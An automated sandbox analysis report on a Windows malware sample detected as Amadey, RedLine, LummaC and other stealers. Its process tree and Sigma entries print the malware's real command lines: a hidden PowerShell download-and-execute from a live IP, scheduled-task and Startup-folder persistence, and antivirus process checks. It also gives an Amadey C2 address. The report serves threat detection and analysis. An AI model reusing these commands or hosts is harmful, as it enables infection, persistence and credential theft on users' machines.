Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
random.exe

Overview

General Information

Sample name:random.exe
Analysis ID:1632643
MD5:177de0a157b6aa0663ffae3821f3b026
SHA1:82b14ddc83e589e0efad23054271d7c9307e5adc
SHA256:dc25d718f31abfb22d767a38383cc4534ecec474e88e9b84b9e437fb97fd5017
Tags:092155Amadeyexeuser-aachum
Infos:

Detection

Amadey, LummaC Stealer, PureLog Stealer, RedLine, zgRAT
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Sigma detected: Powershell download and execute file
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected Amadey
Yara detected Amadeys Clipper DLL
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected PureLog Stealer
Yara detected RedLine Stealer
Yara detected obfuscated html page
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Contains functionality to start a terminal service
Creates HTA files
Drops PE files with a suspicious file extension
Found API chain indicative of sandbox detection
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
PE file contains section with special chars
Powershell drops PE file
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: PowerShell DownloadFile
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Command Patterns In Scheduled Task Creation
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious powershell command line found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to download and execute files (via powershell)
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Wscript called in batch mode (surpress errors)
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for the Microsoft Outlook file path
Searches for user specific document files
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64
  • random.exe (PID: 1296 cmdline: "C:\Users\user\Desktop\random.exe" MD5: 177DE0A157B6AA0663FFAE3821F3B026)
    • cmd.exe (PID: 2288 cmdline: C:\Windows\system32\cmd.exe /c schtasks /create /tn zhvFsmabDCl /tr "mshta C:\Users\user\AppData\Local\Temp\tmxzSk7p3.hta" /sc minute /mo 25 /ru "user" /f MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 1428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 1452 cmdline: schtasks /create /tn zhvFsmabDCl /tr "mshta C:\Users\user\AppData\Local\Temp\tmxzSk7p3.hta" /sc minute /mo 25 /ru "user" /f MD5: 48C2FE20575769DE916F48EF0676A965)
    • mshta.exe (PID: 5428 cmdline: mshta C:\Users\user\AppData\Local\Temp\tmxzSk7p3.hta MD5: 06B02D5C097C7DB1F109749C45F3F505)
      • powershell.exe (PID: 5708 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d; MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 5872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE (PID: 7236 cmdline: "C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE" MD5: 5B1DBCCB1977E33FAE7E0EFA78E96B49)
          • rapes.exe (PID: 7552 cmdline: "C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe" MD5: 5B1DBCCB1977E33FAE7E0EFA78E96B49)
            • ReK7Ewx.exe (PID: 4000 cmdline: "C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exe" MD5: 81791C3BF6C8D01341E77960EAFC2636)
              • cmd.exe (PID: 5444 cmdline: "C:\Windows\system32\cmd.exe" /c expand Ae.msi Ae.msi.bat & Ae.msi.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                • conhost.exe (PID: 6128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • expand.exe (PID: 2976 cmdline: expand Ae.msi Ae.msi.bat MD5: 544B0DBFF3F393BCE8BB9D815F532D51)
                • tasklist.exe (PID: 1040 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
                • findstr.exe (PID: 1236 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
                • tasklist.exe (PID: 3696 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
                • findstr.exe (PID: 6096 cmdline: findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
                • cmd.exe (PID: 1552 cmdline: cmd /c md 789919 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                • extrac32.exe (PID: 4024 cmdline: extrac32 /Y /E Deviation.msi MD5: 9472AAB6390E4F1431BAA912FCFF9707)
                • findstr.exe (PID: 4500 cmdline: findstr /V "Brian" Challenges MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
                • cmd.exe (PID: 4412 cmdline: cmd /c copy /b 789919\Occupation.com + Kate + Invisible + Tells + Gross + Amend + Foul + Snowboard + Digital + Fraud 789919\Occupation.com MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                • cmd.exe (PID: 2536 cmdline: cmd /c copy /b ..\Drug.msi + ..\Contributors.msi + ..\Anthropology.msi + ..\Activities.msi + ..\Opens.msi + ..\Having.msi + ..\Dimension.msi + ..\Responding.msi + ..\Series.msi + ..\Salem.msi q MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                • Occupation.com (PID: 2920 cmdline: Occupation.com q MD5: 62D09F076E6E0240548C2F837536A46A)
                  • cmd.exe (PID: 3836 cmdline: cmd /c schtasks.exe /create /tn "Consider" /tr "wscript //B 'C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.js'" /sc minute /mo 5 /F MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                    • conhost.exe (PID: 2616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                    • schtasks.exe (PID: 7480 cmdline: schtasks.exe /create /tn "Consider" /tr "wscript //B 'C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.js'" /sc minute /mo 5 /F MD5: 48C2FE20575769DE916F48EF0676A965)
                  • cmd.exe (PID: 1464 cmdline: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EduGeniusX.url" & echo URL="C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EduGeniusX.url" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                    • conhost.exe (PID: 7524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • choice.exe (PID: 5880 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
            • V0Bt74c.exe (PID: 7856 cmdline: "C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe" MD5: 019B0EE933AA09404FB1C389DCA4F4D1)
              • V0Bt74c.exe (PID: 3028 cmdline: "C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe" MD5: 019B0EE933AA09404FB1C389DCA4F4D1)
              • V0Bt74c.exe (PID: 4860 cmdline: "C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe" MD5: 019B0EE933AA09404FB1C389DCA4F4D1)
              • WerFault.exe (PID: 6316 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7856 -s 764 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • mshta.exe (PID: 1992 cmdline: C:\Windows\system32\mshta.EXE C:\Users\user\AppData\Local\Temp\tmxzSk7p3.hta MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
    • powershell.exe (PID: 5740 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d; MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 6616 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • rapes.exe (PID: 7520 cmdline: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe MD5: 5B1DBCCB1977E33FAE7E0EFA78E96B49)
  • rapes.exe (PID: 7240 cmdline: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe MD5: 5B1DBCCB1977E33FAE7E0EFA78E96B49)
  • rapes.exe (PID: 7684 cmdline: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe MD5: 5B1DBCCB1977E33FAE7E0EFA78E96B49)
  • rapes.exe (PID: 1920 cmdline: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe MD5: 5B1DBCCB1977E33FAE7E0EFA78E96B49)
  • wscript.exe (PID: 1376 cmdline: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
AmadeyAmadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: Amadey

{"C2 url": "176.113.115.6/Ni9kiput/index.php", "Version": "5.21", "Install Folder": "bb556cff4a", "Install File": "rapes.exe"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security
    dump.pcapJoeSecurity_RedLineYara detected RedLine StealerJoe Security

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mAtJWNv[1].exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mAtJWNv[1].exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          C:\Users\user\AppData\Local\Temp\10141820101\mAtJWNv.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
            C:\Users\user\AppData\Local\Temp\10141820101\mAtJWNv.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              C:\Users\user\AppData\Local\Temp\tmxzSk7p3.htaJoeSecurity_ObshtmlYara detected obfuscated html pageJoe Security
                Click to see the 2 entries

                Memory Dumps

                SourceRuleDescriptionAuthorStrings
                0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmpJoeSecurity_Amadey_3Yara detected Amadey\'s Clipper DLLJoe Security
                  0000000D.00000003.1272817646.0000000004830000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Amadey_3Yara detected Amadey\'s Clipper DLLJoe Security
                    00000033.00000002.3513079723.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
                      0000000B.00000002.1267517499.0000000000311000.00000040.00000001.01000000.0000000E.sdmpJoeSecurity_Amadey_3Yara detected Amadey\'s Clipper DLLJoe Security
                        0000000C.00000002.1304814909.0000000000311000.00000040.00000001.01000000.0000000E.sdmpJoeSecurity_Amadey_3Yara detected Amadey\'s Clipper DLLJoe Security
                          Click to see the 18 entries

                          Unpacked PEs

                          SourceRuleDescriptionAuthorStrings
                          51.2.V0Bt74c.exe.400000.0.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
                            49.2.V0Bt74c.exe.3549550.0.raw.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
                              51.2.V0Bt74c.exe.400000.0.raw.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security

                                Other

                                SourceRuleDescriptionAuthorStrings
                                amsi32_5708.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                                  amsi64_5740.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

                                    Sigma Signatures

                                    System Summary

                                    barindex
                                    Sigma detected: Invoke-Obfuscation CLIP+ Launcher
                                    Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: C:\Windows\system32\cmd.exe /c schtasks /create /tn zhvFsmabDCl /tr "mshta C:\Users\user\AppData\Local\Temp\tmxzSk7p3.hta" /sc minute /mo 25 /ru "user" /f, CommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn zhvFsmabDCl /tr "mshta C:\Users\user\AppData\Local\Temp\tmxzSk7p3.hta" /sc minute /mo 25 /ru "user" /f, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\random.exe", ParentImage: C:\Users\user\Desktop\random.exe, ParentProcessId: 1296, ParentProcessName: random.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn zhvFsmabDCl /tr "mshta C:\Users\user\AppData\Local\Temp\tmxzSk7p3.hta" /sc minute /mo 25 /ru "user" /f, ProcessId: 2288, ProcessName: cmd.exe
                                    Sigma detected: Invoke-Obfuscation VAR+ Launcher
                                    Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: C:\Windows\system32\cmd.exe /c schtasks /create /tn zhvFsmabDCl /tr "mshta C:\Users\user\AppData\Local\Temp\tmxzSk7p3.hta" /sc minute /mo 25 /ru "user" /f, CommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn zhvFsmabDCl /tr "mshta C:\Users\user\AppData\Local\Temp\tmxzSk7p3.hta" /sc minute /mo 25 /ru "user" /f, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\random.exe", ParentImage: C:\Users\user\Desktop\random.exe, ParentProcessId: 1296, ParentProcessName: random.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn zhvFsmabDCl /tr "mshta C:\Users\user\AppData\Local\Temp\tmxzSk7p3.hta" /sc minute /mo 25 /ru "user" /f, ProcessId: 2288, ProcessName: cmd.exe
                                    Sigma detected: PowerShell DownloadFile
                                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\tmxzSk7p3.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 5428, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, ProcessId: 5708, ProcessName: powershell.exe
                                    Sigma detected: Script Interpreter Execution From Suspicious Folder
                                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: mshta C:\Users\user\AppData\Local\Temp\tmxzSk7p3.hta, CommandLine: mshta C:\Users\user\AppData\Local\Temp\tmxzSk7p3.hta, CommandLine|base64offset|contains: m, Image: C:\Windows\SysWOW64\mshta.exe, NewProcessName: C:\Windows\SysWOW64\mshta.exe, OriginalFileName: C:\Windows\SysWOW64\mshta.exe, ParentCommandLine: "C:\Users\user\Desktop\random.exe", ParentImage: C:\Users\user\Desktop\random.exe, ParentProcessId: 1296, ParentProcessName: random.exe, ProcessCommandLine: mshta C:\Users\user\AppData\Local\Temp\tmxzSk7p3.hta, ProcessId: 5428, ProcessName: mshta.exe
                                    Sigma detected: Suspicious Command Patterns In Scheduled Task Creation
                                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "Consider" /tr "wscript //B 'C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.js'" /sc minute /mo 5 /F, CommandLine: schtasks.exe /create /tn "Consider" /tr "wscript //B 'C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.js'" /sc minute /mo 5 /F, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: cmd /c schtasks.exe /create /tn "Consider" /tr "wscript //B 'C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.js'" /sc minute /mo 5 /F, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 3836, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks.exe /create /tn "Consider" /tr "wscript //B 'C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.js'" /sc minute /mo 5 /F, ProcessId: 7480, ProcessName: schtasks.exe
                                    Sigma detected: Suspicious MSHTA Child Process
                                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\tmxzSk7p3.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 5428, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, ProcessId: 5708, ProcessName: powershell.exe
                                    Sigma detected: Suspicious Script Execution From Temp Folder
                                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: mshta C:\Users\user\AppData\Local\Temp\tmxzSk7p3.hta, CommandLine: mshta C:\Users\user\AppData\Local\Temp\tmxzSk7p3.hta, CommandLine|base64offset|contains: m, Image: C:\Windows\SysWOW64\mshta.exe, NewProcessName: C:\Windows\SysWOW64\mshta.exe, OriginalFileName: C:\Windows\SysWOW64\mshta.exe, ParentCommandLine: "C:\Users\user\Desktop\random.exe", ParentImage: C:\Users\user\Desktop\random.exe, ParentProcessId: 1296, ParentProcessName: random.exe, ProcessCommandLine: mshta C:\Users\user\AppData\Local\Temp\tmxzSk7p3.hta, ProcessId: 5428, ProcessName: mshta.exe
                                    Sigma detected: WScript or CScript Dropper
                                    Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.js", CommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1048, ProcessCommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.js", ProcessId: 1376, ProcessName: wscript.exe
                                    Sigma detected: Potential Binary Or Script Dropper Via PowerShell
                                    Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5708, TargetFilename: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE
                                    Sigma detected: PowerShell Download Pattern
                                    Source: Process startedAuthor: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\tmxzSk7p3.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 5428, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, ProcessId: 5708, ProcessName: powershell.exe
                                    Sigma detected: PowerShell Web Download
                                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\tmxzSk7p3.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 5428, ParentProcessName: mshta.exe, ProcessCommandLine: 